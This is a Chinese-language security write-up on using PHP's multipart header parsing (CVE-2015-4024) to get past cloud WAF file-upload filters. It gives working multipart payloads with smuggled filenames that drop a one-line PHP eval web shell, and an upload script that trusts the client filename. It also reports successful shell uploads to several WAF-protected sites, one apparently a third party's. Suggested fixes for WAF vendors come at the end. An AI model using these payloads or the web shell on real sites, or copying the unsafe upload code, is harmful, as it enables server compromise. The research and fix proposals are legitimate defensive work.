0x00 背景介紹

---

今天我們想從2015.04.03的一個PHP遠端dos漏洞（CVE-2015-4024）說起。技術細節見如下連結，中文版：/papers/?id=6077，英文版 ：https://bugs.php.net/bug.php?id=69364。因為php解析body part的header時進行字串拼接，而拼接過程重複複製字元導致DOS。事實上該漏洞還有其他非dos的利用價值，其中之一，就是繞過當前各種雲WAF的檔案上傳防禦策略。

目前國內外流行的雲WAF廠商有如百度雲加速，360網站衛士，加速樂，雲盾等。因為PHP遠端dos漏洞及PHP官方修復方案的特點，我們成功利用該漏洞繞過了當前主流WAF的檔案上傳防禦，例如百度雲加速、360網站衛士、知道創於加速樂、安全狗。

接下來，我們以PHP為例，詳細解析我們的繞過方法。

0x01 繞過WAF的原理

---

根據PHP DOS漏洞原理，在multipart_buffer_headers函式解析header對應value時，value值存在n行。每行的字串以空白符開頭或不存字元':'，都觸發以下合併value的程式碼塊。那麼解析header的value就要執行(n-1)次合併value的程式碼塊，從而導致DOS。

#!php
prev_len= strlen(prev_entry.value);
     cur_len= strlen(line);
 
     entry.value= emalloc(prev_len + cur_len + 1); //1次分片記憶體
     memcpy(entry.value,prev_entry.value, prev_len); //1次複製
     memcpy(entry.value+ prev_len, line, cur_len);   //1次複製
     entry.value[cur_len+ prev_len] = '\0';
 
     entry.key= estrdup(prev_entry.key);
 
     zend_llist_remove_tail(header);//1次記憶體釋放

而PHP官方修復方案，在進行合併時，避免重複複製，從而避免DOS。繞過WAF的關鍵在於，PHP multipart_buffer_headers函式解析header對應value時，value值存在多行。每行的字串以空白符開頭或不存字元':'，將進行合併。而WAF在解析檔案上傳的檔名時，沒有考慮協議相容，不進行多行合併，就可以被繞過。

根據原理構造繞過WAF檔案上傳防禦的payload，WAF解析到的檔名為”test3.jpg”，而PHP解析到的檔名是“test3.jpg\nf/shell.php”，因為”/”是目錄分隔符，上傳的檔名變為shell.php。以下是繞過paylaod、測試指令碼、paylaod進行檔案上傳的效果圖。

WAF繞過payload:

#!php
------WebKitFormBoundaryx7V4AhipWn8ig52y
Content-Disposition: form-data; name="file"; filename="test3.jpg\nsf/shell.php
Content-Type: application/octet-stream

<?php eval($_GET['c'])?>
------WebKitFormBoundaryx7V4AhipWn8ig52y

檔案上傳功能測試腳：

#!php
<?php
         $name = $_FILES['file']['name'];
        echo $name;
        echo "\n";
        move_uploaded_file($_FILES['file']['tmp_name'] , '/usr/local/nginx/html/upload/'.$_FILES['file']['name']);
        echo "upload success! ".$_FILES['file']['name'];
        echo "\n";
        echo strlen($_FILES['file']['name']);
?>

Payload能夠正常上傳

0x02 繞過WAF實戰

---

筆者透過搭建自己的測試站，接入360網站衛士和加速樂，驗證繞過WAF檔案上傳防禦的方法。

2.1 繞過360網站衛士

步驟1，驗證網站已被360網站衛士防禦，攔截了直接上傳PHP檔案的請求。

步驟2：成功繞過360網站衛士，上傳shell成功，檔案是apo.php。在該請求中，有沒有Content-Type不影響繞過。

2.2 繞過知道創宇加速樂

步驟一：驗證網站被加速樂保護，攔截了直接上傳PHP檔案的請求。

步驟二：

成功繞過加速樂，上傳shell，檔案是syt.php。

2.3 繞過百度雲加速

百度雲加速與CloudFlare，從百度勻加速攔截頁面可以看出使用的是CloudFlare. 但是估計有本地化，百度雲加速應該是百度和CloudFlare共同產物吧。測試百度沒有搭建自己的測試環境，找了個接入了百度雲加速的站進行測試。

步驟一：驗證網站被百度雲加速保護，攔截了直接上傳PHP檔案的請求。

步驟二：成功繞過雲加速

2.4 安全狗的測試

用該方法測試安全狗的檔案上傳，

#!bash
Content-Disposition: form-data; name="file"; filename="2.php
aa:
Content-Type: image/jpeg

php與aa這間的是%0a，處理請求的Apache程式直接崩潰。感覺可以溢位，沒有深入。

2.5 CloudFlare的測試

為了測試能否繞過國外版的CloudFlare，特意買了它的服務。結果，在規則全開的情況下，競然不攔截檔案上傳。

2.6 Amazon WAF

亞馬遜的WAF沒有規則，所有規則需要使用者配置。在配置的選項裡，沒有檔案上傳的選項，所以也就沒有繞過的說法。國內WAF和國外WAF的區別挺大，為什麼這麼設計還是值得深思。

我們還繞過了其他WAF，這裡不一一列舉。

0x03 擴充套件—更多的工作

---

3.1 分析filename其他字元的繞過

同理，我們發現除了雙引號外，使用單引號也能繞過WAF的防禦，並實現檔案上傳。

#!php
------WebKitFormBoundaryx7V4AhipWn8ig52y
Content-Disposition: form-data; name="file"; filename='test3.jpg\nsf/shell.php
Content-Type: application/octet-stream

<?php eval($_GET['c'])?>
------WebKitFormBoundaryx7V4AhipWn8ig52y

3.2 分析其他應用指令碼語言

我們也發現jsp解析也有自己的特點，同時可被用於繞過WAF。暫時未測試asp,aspx,python等常用的WEB應用指令碼語言。

0x04 修復方案

---

4.1 修復方案一

解析檔案上傳請求時，如果發現請求不符合協議規範，則拒絕請求。可能會產生誤攔截，需要評估誤攔截的影響範圍。

4.2 修復方案二

相容php的檔案解析方式，解析檔名時，以單引號或雙引號開頭，並且對應的單引號或雙引號閉合。

0x05 總結

---

本文透過Review PHP遠端dos漏洞(CVE-2015-4024)，並利用該特性繞過現有WAF的檔案上傳防禦，成功上傳shell。 更重要的價值，提供給我們一個繞過WAF的新思路，一種研究新方向：利用後端應用指令碼與WAF行為的差異繞過WAF的防禦。總的來說，一款優秀的WAF應該能夠處理相容WEB應用容器、標準協議、web伺服器這間的差異。